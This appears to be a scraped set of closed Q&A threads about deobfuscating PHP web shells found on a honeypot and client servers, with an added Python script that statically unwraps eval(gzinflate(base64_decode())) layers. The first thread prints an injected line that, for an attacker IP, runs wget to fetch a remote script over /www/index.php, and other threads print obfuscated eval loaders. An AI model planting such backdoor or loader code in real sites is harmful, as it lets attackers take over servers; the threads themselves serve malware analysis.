Deobfuscate this PHP shell attack [closed] - php

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 7 years ago.
One of my honeypot systems has a pretty interesting PHP shell on it. I've been trying to decode it, but I'm not having any luck getting the contents of the gzinflated, base64-encoded part of the script.
Maybe someone with a little more experience with deobfuscating could take a look at it?
Here's the original pastebin they used to download to my honeypot:
http://pastebin.com/1w59Ew9S
<?php if($_SERVER["REMOTE_ADDR"] =='ATTACKER_IP') {#system('wget http://pastebin.com/raw.php?i=1w59Ew9S -O /www/index.php;ls -la /www/index.php');exit; }?>
I attempted to deobfuscate it myself by printing variables in different places, but I can't for the life of me get the contents to print out.
Here's my attempt at making it a little bit more human-readable:
http://pastebin.com/BRbyVzyZ

Related

How to deobfuscate this potential PHP malware found on a client system? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 3 years ago.
I'm trying to de-obfuscate this script found on a client system with no luck so far.
<?php function LwAC($SvniN)
{
$SvniN=gzinflate(base64_decode($SvniN));
for($i=0;$i<strlen($SvniN);$i++)
{
$SvniN[$i] = chr(ord($SvniN[$i])-1);
}
return $SvniN;
}eval(LwAC("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"));?>
Please note that I have to remove plenty of the codes before this "));?>
A very big thank you to everyone who took the time to go through this question and put in advice and direction in an attempt to deobfuscate this PHP code. Special thanks to #Hasta Dhana.
Now, taking into consideration the recommendation of #digijay to do this on a virtual machine, where it can simply be deleted if anything goes wrong, the use of an online PHP compiler as recommended and used by #Hasta Dhana was an awesome choice. All I had to do was paste in the whole code, change the eval to echo and run it. That successfully got the work done, and pretty fast, except that the output was obfuscated in exactly the same way. This time the solution is as simple as deobfuscating the output by repeating the same actions that got us here: copy the whole of the output, change the eval in it to echo, run it, and hurray, there we have the script deobfuscated.
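A static unwrapping script for the eval(gzinflate(base64_decode(...))) wrapper from the first question and the LwAC() byte-shift variant in this one, added here as an example in Python; it is not code from either post. It never runs the decoded PHP: it decodes the string argument of each eval() wrapper in place and repeats, since, as the answer above notes, the output is often wrapped the same way again. The obfuscated blob is constructed inline by inverting the transform; a real file's contents would be passed in as php_source.

```python
import base64
import re
import zlib

# Constructed sample payload (not from the page); decoding must reproduce it exactly.
INNER_PHP = '<?php echo "deobfuscated payload"; ?>'

# The two wrappers seen in the questions above.
LWAC_RE = re.compile(r"eval\(\s*LwAC\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
GZB64_RE = re.compile(
    r"eval\(\s*gzinflate\(\s*base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*\)")

def gzinflate(data: bytes) -> bytes:
    """PHP's gzinflate(): a raw DEFLATE stream with no zlib/gzip header."""
    return zlib.decompress(data, -zlib.MAX_WBITS)

def lwac_decode(blob: str, shift: int = 1) -> str:
    """Static LwAC(): gzinflate(base64_decode(blob)), then every byte minus shift.
    shift=0 is the plain eval(gzinflate(base64_decode(...))) case of the first question."""
    inflated = gzinflate(base64.b64decode(blob))
    return bytes((b - shift) & 0xFF for b in inflated).decode("latin-1")

def lwac_encode(plaintext: str, shift: int = 1) -> str:
    """Inverse of lwac_decode(); only used to build the constructed sample."""
    shifted = bytes((b + shift) & 0xFF for b in plaintext.encode("latin-1"))
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return base64.b64encode(comp.compress(shifted) + comp.flush()).decode("ascii")

def unwrap_layers(php_source: str, max_layers: int = 20) -> tuple:
    """Swap each eval(...) wrapper for its decoded body without executing anything,
    repeating while the result is wrapped again. Returns (innermost source, layers removed)."""
    src = php_source
    for layer in range(max_layers):
        m = LWAC_RE.search(src)
        if m:
            src = lwac_decode(m.group(1), shift=1)
            continue
        m = GZB64_RE.search(src)
        if m:
            src = lwac_decode(m.group(1), shift=0)
            continue
        return src, layer
    return src, max_layers

def build_sample() -> str:
    """Constructed three-layer sample: payload in LwAC twice, then in gzinflate/base64."""
    layer1 = 'eval(LwAC("%s"));' % lwac_encode(INNER_PHP)
    layer2 = '<?php eval(LwAC("%s")); ?>' % lwac_encode(layer1)
    return '<?php eval(gzinflate(base64_decode("%s"))); ?>' % lwac_encode(layer2, shift=0)
```

Samples that use a different per-byte transform (or a different function name) need their own regex and a matching decode step; the loop structure stays the same.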

can people read the content of an online php file? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 8 years ago.
My PHP file online has permission settings 444 ('readable' for everyone).
When I open the file in Firefox, it correctly only shows the output of the file (meaning things that are echoed or printed).
I want people to NOT EVER see the inside of the PHP file because it shows sensitive information. So, are there some people who are able to look into the inside of the PHP file?
Unless someone has access to the server then generally no.
There are ways to purposely make the source code visible however.
http://php.net/manual/en/function.show-source.php

How to decode this code ? php $_F=__FILE__;$_X= Byterun Decoder [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 8 years ago.
I would like to decode this PHP page. I tried with this site, but when I decode the code, the code is still encrypted :/
Can you help me please?
Page encrypted:
<?php
$_F=__FILE__;
$_X='';
$_D=strrev('edoced_46esab');
eval($_D('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdTZ1BPOVlaV0ZLbXF5ZnhjakxKUnp1TTV2TnRzMWIue0I0bkNdaS8yRGwwRWhlQQpbZDg9UXA+VlhvIEh9NkdJdzdrYTNUclU8JywnPVI5b2RtcGxBRVB5azhndls1M3hyTWV6cVpIaTdZaFc8RHNHez5DY1h9MU4vYWZqNl1KdHVTIAouQlVud1ZLTFFPMjBJVEY0YicpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw='));
?>
Here is the plain source code of the file you asked about.
As I said in a post earlier today, if you have access to the .php file, you have access to the source no matter what.
Good luck!
This is actually pretty easy. Your encrypted file looks like this:
<?php $_F=__FILE__;$_X='encrypted text';eval(base64_decode('rubbish'));?>
Paste just the 'encrypted text' section into the top box of this page and hit Decode This Rubbish.

Weird exploit messing with email [closed]

Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 8 years ago.
Found a weird hack today that someone was exploiting;
I was wondering how this arbitrary code could execute thousands of emails an hour.
http://pastebin.com/m7nBSmfB
There's nothing weird about the code you posted -- it builds up a PHP function in an obfuscated fashion -- then it calls the generated code.
The real problem/issue is, how is your server being made to run this code? If you have indeed been exploited by this, it's because you're allowing them to run arbitrary PHP code on your server.
You need to figure out how that happened.

remote web server compilation? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 8 years ago.
So I'm kind of tossing an idea around in my head... is it feasible to write a web app that asks a user to input a snippet of code, then compiles it remotely on a server and returns the output to the user?
Feasible? Sure, you could definitely make this work from a technical point of view. But in terms of security, it sounds very dangerous.